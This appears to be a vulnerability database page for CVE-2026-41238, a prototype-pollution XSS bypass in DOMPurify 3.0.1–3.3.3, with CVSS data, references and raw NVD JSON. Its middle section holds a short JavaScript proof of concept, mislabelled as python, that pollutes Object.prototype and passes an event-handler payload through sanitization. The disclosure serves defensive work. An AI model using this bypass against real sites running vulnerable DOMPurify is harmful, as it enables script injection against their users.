CVE-2026-41238

Description

DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions 3.0.1 through 3.3.3 are vulnerable to a prototype pollution-based XSS bypass. When an application uses `DOMPurify.sanitize()` with the default configuration (no `CUSTOM_ELEMENT_HANDLING` option), a prior prototype pollution gadget can inject permissive `tagNameCheck` and `attributeNameCheck` regex values into `Object.prototype`, causing DOMPurify to allow arbitrary custom elements with arbitrary attributes — including event handlers — through sanitization. Version 3.4.0 fixes the issue.

CVSS Details

CVSS Score

6.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

DOMPurify 3.0.1 - 3.3.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Step 1: Simulate Prototype Pollution
// Attackers inject these regex values into Object.prototype via another gadget
Object.prototype.tagNameCheck = /.*/;
Object.prototype.attributeNameCheck = /.*/;

// Step 2: Create DOMPurify instance
const clean = DOMPurify.sanitize;

// Step 3: Malicious payload containing custom element and event handler
const dirty = '<my-custom-element onmouseover="alert(1)">XSS</my-custom-element>';

// Step 4: Sanitize
// Due to pollution, the checks pass and the event handler is not stripped
const sanitized = clean(dirty);

// Step 5: Render the payload
document.body.innerHTML = sanitized;

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41238
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41238
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41238/
[4] VulDB https://vuldb.com/cve/CVE-2026-41238
[5] https://github.com/cure53/DOMPurify/releases/tag/3.4.0
[6] https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp
[7] https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41238", "sourceIdentifier": "[email protected]", "published": "2026-04-23T16:16:26.420", "lastModified": "2026-04-23T18:16:29.073", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions 3.0.1 through 3.3.3 are vulnerable to a prototype pollution-based XSS bypass. When an application uses `DOMPurify.sanitize()` with the default configuration (no `CUSTOM_ELEMENT_HANDLING` option), a prior prototype pollution gadget can inject permissive `tagNameCheck` and `attributeNameCheck` regex values into `Object.prototype`, causing DOMPurify to allow arbitrary custom elements with arbitrary attributes — including event handlers — through sanitization. Version 3.4.0 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-1321"}]}], "references": [{"url": "https://github.com/cure53/DOMPurify/releases/tag/3.4.0", "source": "[email protected]"}, {"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp", "source": "[email protected]"}, {"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-v9jr-rg53-9pgp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}